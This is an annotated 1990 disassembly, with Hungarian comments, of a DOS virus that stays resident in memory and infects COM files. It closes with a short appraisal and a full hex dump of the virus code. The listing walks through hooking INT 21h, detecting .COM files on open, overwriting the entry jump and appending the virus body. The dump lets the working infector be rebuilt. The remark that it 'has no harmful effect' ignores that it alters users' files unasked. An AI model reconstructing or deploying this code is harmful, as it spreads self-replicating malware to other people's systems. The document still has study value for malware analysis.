@ virus unassembled list:
|
||
`90.07.21.
|
||
|
||
Magyarázat: Kövári László
|
||
Tel.: (41) 21-822 07-13:20 mh.
|
||
21-033 18:00-
|
||
|
||
|
||
0EB0:0100 E80000 CALL 0103
|
||
0EB0:0103 90 NOP
|
||
0EB0:0104 5E POP SI ;SI=IP b ziscˇm
|
||
0EB0:0105 50 PUSH AX
|
||
0EB0:0106 51 PUSH CX
|
||
0EB0:0107 B82135 MOV AX,3521
|
||
0EB0:010A CD21 INT 21 ;INT 21h cˇm lek‚rdez‚se
|
||
0EB0:010C 8CC0 MOV AX,ES
|
||
0EB0:010E 3D0040 CMP AX,4000 ;mem˘ri ban vam ?
|
||
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l‚
|
||
;mutat!
|
||
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
|
||
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
|
||
0EB0:0119 03F2 ADD SI,DX ;b zishoz
|
||
0EB0:011B 8B1C MOV BX,[SI]
|
||
0EB0:011D 8B4C02 MOV CX,[SI+02]
|
||
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
|
||
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
|
||
0EB0:0128 8CD8 MOV AX,DS
|
||
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
|
||
0EB0:012C 59 POP CX
|
||
0EB0:012D 58 POP AX
|
||
0EB0:012E BB0001 MOV BX,0100
|
||
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
|
||
;lefut az eredeti prg.
|
||
;Ha nincs a memóriában
|
||
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚nek
|
||
;paragrafuscíme
|
||
0EB0:0136 2D0008 SUB AX,0800
|
||
0EB0:0139 8EC0 MOV ES,AX ;virus Łj szegmens
|
||
0EB0:013B BF0001 MOV DI,0100
|
||
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
|
||
0EB0:0141 B90002 MOV CX,0200 ;virus m‚rete
|
||
0EB0:0144 F3 REPZ
|
||
0EB0:0145 A4 MOVSB ;virus m sol sa az
|
||
;új szegmensbe
|
||
0EB0:0146 8C06F200 MOV [00F2],ES ;Łj szegmenscˇm
|
||
0EB0:014A B95501 MOV CX,0155 ;Łj szegmensben a be-
|
||
;lépési offset-je
|
||
0EB0:014D 890EF000 MOV [00F0],CX
|
||
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az Łj seg.:0155
|
||
|
||
;belépési pont
|
||
0EB0:0155 8CC1 MOV CX,ES
|
||
0EB0:0157 8CD8 MOV AX,DS
|
||
0EB0:0159 26 ES:
|
||
0EB0:015A A38C02 MOV [028C],AX ;r‚gi seg (eredeti
|
||
;programé)
|
||
0EB0:015D B80001 MOV AX,0100
|
||
0EB0:0160 26 ES:
|
||
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
|
||
0EB0:0164 8CC0 MOV AX,ES
|
||
0EB0:0166 8ED8 MOV DS,AX ;DS=Łj seg
|
||
0EB0:0168 B82135 MOV AX,3521
|
||
0EB0:016B CD21 INT 21 ;INT 21h lek‚rdez‚se
|
||
0EB0:016D 2E CS:
|
||
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
|
||
0EB0:0172 8CC3 MOV BX,ES
|
||
0EB0:0174 2E CS:
|
||
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
|
||
0EB0:0179 B8A501 MOV AX,01A5 ;Łj INT 21h offset
|
||
0EB0:017C 8BD0 MOV DX,AX
|
||
0EB0:017E 8BC1 MOV AX,CX
|
||
0EB0:0180 8ED8 MOV DS,AX
|
||
0EB0:0182 B82125 MOV AX,2521
|
||
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
|
||
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
|
||
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
|
||
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
|
||
0EB0:0192 8ED8 MOV DS,AX
|
||
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
|
||
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
|
||
0EB0:019C 8EC0 MOV ES,AX
|
||
0EB0:019E 59 POP CX
|
||
0EB0:019F 58 POP AX
|
||
0EB0:01A0 2E CS:
|
||
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
|
||
;programra
|
||
|
||
;új INT 21h rutin
|
||
0EB0:01A5 90 NOP
|
||
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
|
||
0EB0:01A9 7403 JZ 01AE ;igen
|
||
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
|
||
;INT 21h-ra
|
||
0EB0:01AE 1E PUSH DS
|
||
0EB0:01AF 06 PUSH ES
|
||
0EB0:01B0 50 PUSH AX
|
||
0EB0:01B1 53 PUSH BX
|
||
0EB0:01B2 51 PUSH CX
|
||
0EB0:01B3 52 PUSH DX
|
||
0EB0:01B4 57 PUSH DI
|
||
0EB0:01B5 56 PUSH SI
|
||
|
||
;Ellenőrzi hogy COM file-e
|
||
|
||
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
|
||
0EB0:01B8 8CDE MOV SI,DS
|
||
0EB0:01BA 8EC6 MOV ES,SI
|
||
0EB0:01BC B000 MOV AL,00
|
||
0EB0:01BE B93200 MOV CX,0032
|
||
0EB0:01C1 FC CLD
|
||
0EB0:01C2 F2 REPNZ
|
||
0EB0:01C3 AE SCASB ;PATH lem sol sa
|
||
0EB0:01C4 83EF03 SUB DI,+03
|
||
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
|
||
0EB0:01CA 26 ES:
|
||
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
|
||
0EB0:01CD 7403 JZ 01D2 ;igen
|
||
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
|
||
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
|
||
0EB0:01D5 26 ES:
|
||
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
|
||
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
|
||
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
|
||
0EB0:01DE B43D MOV AH,3D ;file nyit sa
|
||
0EB0:01E0 B002 MOV AL,02 ;ˇr s/olvas s
|
||
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
|
||
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
|
||
|
||
;File méret ellenőrzés
|
||
|
||
0EB0:01E9 90 NOP
|
||
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
|
||
0EB0:01EC B90000 MOV CX,0000
|
||
0EB0:01EF BA0000 MOV DX,0000
|
||
0EB0:01F2 B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:01F8 3D00FE CMP AX,FE00
|
||
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
|
||
|
||
;Eredeti 4 byte beolvasása (JMP+operandusa)
|
||
|
||
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
|
||
0EB0:0200 2E CS:
|
||
0EB0:0201 A38102 MOV [0281],AX
|
||
0EB0:0204 B80042 MOV AX,4200 ;file elej‚re poz.
|
||
0EB0:0207 B90000 MOV CX,0000
|
||
0EB0:020A BA0000 MOV DX,0000
|
||
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0210 B43F MOV AH,3F ;olvas s
|
||
0EB0:0212 B90400 MOV CX,0004 ;4 byte
|
||
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
|
||
0EB0:0218 8CCF MOV DI,CS
|
||
0EB0:021A 8EDF MOV DS,DI ;DS=CS
|
||
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:021F B005 MOV AL,05
|
||
0EB0:0221 3A068902 CMP AL,[0289]
|
||
0EB0:0225 743F JZ 0266
|
||
|
||
;Virusra mutató JMP+op beírása a programba
|
||
|
||
0EB0:0227 B80042 MOV AX,4200 ;file elej‚re poz.
|
||
0EB0:022A B90000 MOV CX,0000
|
||
0EB0:022D 8BD1 MOV DX,CX
|
||
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0232 B0E9 MOV AL,E9 ;JMP k˘dja
|
||
0EB0:0234 2E CS:
|
||
0EB0:0235 A28002 MOV [0280],AL ;leteszi
|
||
0EB0:0238 B005 MOV AL,05
|
||
0EB0:023A 2E CS:
|
||
0EB0:023B A28302 MOV [0283],AL
|
||
0EB0:023E B90400 MOV CX,0004 ;4 byte
|
||
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
|
||
0EB0:0244 0E PUSH CS
|
||
0EB0:0245 1F POP DS
|
||
0EB0:0246 B440 MOV AH,40 ;kiˇr s
|
||
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
|
||
|
||
;1C0h byte kiírása FERTŐZÉS!
|
||
|
||
0EB0:024B B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||
0EB0:024E B90000 MOV CX,0000
|
||
0EB0:0251 8BD1 MOV DX,CX
|
||
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t˘l
|
||
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
|
||
0EB0:025C B440 MOV AH,40 ;kiˇr sa
|
||
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
|
||
|
||
;Fertőzött file zárása
|
||
|
||
0EB0:0261 B43E MOV AH,3E
|
||
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0266 5E POP SI
|
||
0EB0:0267 5F POP DI
|
||
0EB0:0268 5A POP DX
|
||
0EB0:0269 59 POP CX
|
||
0EB0:026A 5B POP BX
|
||
0EB0:026B 58 POP AX
|
||
0EB0:026C 07 POP ES
|
||
0EB0:026D 1F POP DS
|
||
0EB0:026E 90 NOP
|
||
0EB0:026F 2E CS:
|
||
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
|
||
;INT 21h-ra
|
||
0EB0:0274 CF IRET
|
||
|
||
;Eredeti INT 21h hívása
|
||
0EB0:0275 9C PUSHF ;IRET miatt!
|
||
0EB0:0276 2E CS:
|
||
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
|
||
0EB0:027B C3 RET
|
||
|
||
0EB0:027C 16 PUSH SS
|
||
0EB0:027D 130C ADC CX,[SI]
|
||
0EB0:027F 02E9 ADD CH,CL
|
||
0EB0:0281 1C00 SBB AL,00
|
||
0EB0:0283 050101 ADD AX,0101
|
||
0EB0:0286 EB12 JMP 029A
|
||
0EB0:0288 90 NOP
|
||
0EB0:0289 49 DEC CX
|
||
0EB0:028A 0001 ADD [BX+DI],AL
|
||
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
|
||
0EB0:028E 0A0D OR CL,[DI]
|
||
0EB0:0290 9A6476206D CALL 6D20:7664
|
||
0EB0:0295 69 DB 69
|
||
0EB0:0296 6E DB 6E
|
||
0EB0:0297 64 DB 64
|
||
0EB0:0298 65 DB 65
|
||
0EB0:0299 6E DB 6E
|
||
0EB0:029A 206E61 AND [BP+61],CH
|
||
0EB0:029D 67 DB 67
|
||
0EB0:029E 7974 JNS 0314
|
||
0EB0:02A0 7564 JNZ 0306
|
||
0EB0:02A2 A073A3 MOV AL,[A373]
|
||
0EB0:02A5 6E DB 6E
|
||
0EB0:02A6 61 DB 61
|
||
0EB0:02A7 6B DB 6B
|
||
0EB0:02A8 2120 AND [BX+SI],SP
|
||
0EB0:02AA 54 PUSH SP
|
||
0EB0:02AB 7572 JNZ 031F
|
||
0EB0:02AD 62 DB 62
|
||
0EB0:02AE 6F DB 6F
|
||
0EB0:02AF 204020 AND [BX+SI+20],AL
|
||
0EB0:02B2 2E CS:
|
||
0EB0:02B3 2E CS:
|
||
0EB0:02B4 2E CS:
|
||
0EB0:02B5 202E2E2E AND [2E2E],CH
|
||
0EB0:02B9 201A AND [BP+SI],BL
|
||
0EB0:02BB 0000 ADD [BX+SI],AL
|
||
0EB0:02BD 0000 ADD [BX+SI],AL
|
||
0EB0:02BF 005374 ADD [BP+DI+74],DL
|
||
0EB0:02C2 20E8 AND AL,CH
|
||
0EB0:02C4 4E DEC SI
|
||
0EB0:02C5 01E9 ADD CX,BP
|
||
0EB0:02C7 51 PUSH CX
|
||
0EB0:02C8 FF2EC606 JMP FAR [06C6]
|
||
0EB0:02CC 050006 ADD AX,0600
|
||
0EB0:02CF 2E CS:
|
||
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
|
||
0EB0:02D6 EB7B JMP 0353
|
||
0EB0:02D8 90 NOP
|
||
0EB0:02D9 2E CS:
|
||
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
|
||
0EB0:02E0 EB71 JMP 0353
|
||
0EB0:02E2 90 NOP
|
||
0EB0:02E3 2E CS:
|
||
0EB0:02E4 FE060600 INC BYTE PTR [0006]
|
||
0EB0:02E8 56 PUSH SI
|
||
0EB0:02E9 8BF3 MOV SI,BX
|
||
0EB0:02EB 83C302 ADD BX,+02
|
||
0EB0:02EE 3E DS:
|
||
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
|
||
0EB0:02F2 2E CS:
|
||
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
|
||
0EB0:02F8 750A JNZ 0304
|
||
0EB0:02FA AC LODSB
|
||
0EB0:02FB 3C00 CMP AL,00
|
||
0EB0:02FD 743B JZ 033A
|
||
0EB0:02FF E80F03 CALL 0611
|
||
|
||
|
||
Megjegyzés:
|
||
|
||
Nincs káros hatása. Megoldása kitűnő, hiszen még egy system
|
||
info lekérése esetén sem kisebb a DOS által látott memó-
|
||
ria méret, mint a fizikai RAM méret!
|
||
|
||
DUMP
|
||
|
||
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
|
||
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
|
||
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
|
||
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
|
||
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
|
||
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
|
||
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
|
||
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
|
||
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
|
||
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
|
||
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
|
||
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
|
||
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
|
||
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
|
||
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
|
||
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
|
||
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
|
||
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
|
||
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
|
||
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
|
||
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
|
||
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
|
||
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
|
||
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
|
||
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
|
||
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
|
||
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
|
||
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
|
||
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
|
||
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
|
||
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
|
||
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
|
||
0EB0:0300 0F .
|
||
|